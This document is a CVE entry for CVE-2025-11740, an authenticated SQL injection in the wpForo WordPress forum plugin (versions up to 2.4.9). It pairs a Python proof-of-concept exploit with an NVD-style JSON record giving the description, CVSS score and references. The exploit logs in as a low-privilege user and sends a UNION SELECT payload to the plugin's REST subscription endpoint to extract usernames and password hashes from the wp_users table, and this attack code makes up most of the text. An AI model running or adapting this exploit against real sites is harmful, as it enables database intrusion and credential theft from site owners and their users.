CVE-2025-11740

# CVE-2025-11740 wpForo SQL Injection PoC # Target: WordPress with wpForo Forum plugin <= 2.4.9 # Authentication: Requires Subscriber-level access or higher import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-site.com/wp-json/wpforo/v1/subscription" WP_USER = "attacker_username" WP_PASS = "attacker_password" def get_wp_token(): """Obtain WordPress authentication cookie/token""" login_url = "http://target-site.com/wp-login.php" data = { "log": WP_USER, "pwd": WP_PASS, "wp-submit": "Log In" } session = requests.Session() resp = session.post(login_url, data=data, allow_redirects=False) return session.cookies.get_dict() def exploit_sqli(cookies): """Execute SQL injection to extract database information""" headers = { "Content-Type": "application/json", "X-WP-Nonce": "[Obtain from wp-admin or REST API]" } # Malicious payload - extracts user login and password hash sqli_payload = "1' UNION SELECT user_login,user_pass FROM wp_users-- -" data = { "action": "delete", "subscription_id": sqli_payload, "forum_id": 1 } resp = requests.post( TARGET_URL, json=data, cookies=cookies, headers=headers, timeout=10 ) return resp.text if __name__ == "__main__": print("[*] CVE-2025-11740 wpForo SQL Injection Exploit") cookies = get_wp_token() if cookies: print("[+] Authentication successful") result = exploit_sqli(cookies) print(f"[+] Response: {result}") else: print("[-] Authentication failed")

{"cve": {"id": "CVE-2025-11740", "sourceIdentifier": "[email protected]", "published": "2025-11-01T06:15:39.780", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The wpForo Forum plugin for WordPress is vulnerable to SQL Injection via the Subscriptions Manager in all versions up to, and including, 2.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3386327/wpforo/tags/2.4.10/modules/subscriptions/Subscriptions.php?old=3380558&old_path=wpforo%2Ftags%2F2.4.9%2Fmodules%2Fsubscriptions%2FSubscriptions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa1eaac2-a23b-4ef6-803a-15f7ec7e5728?source=cve", "source": "[email protected]"}]}}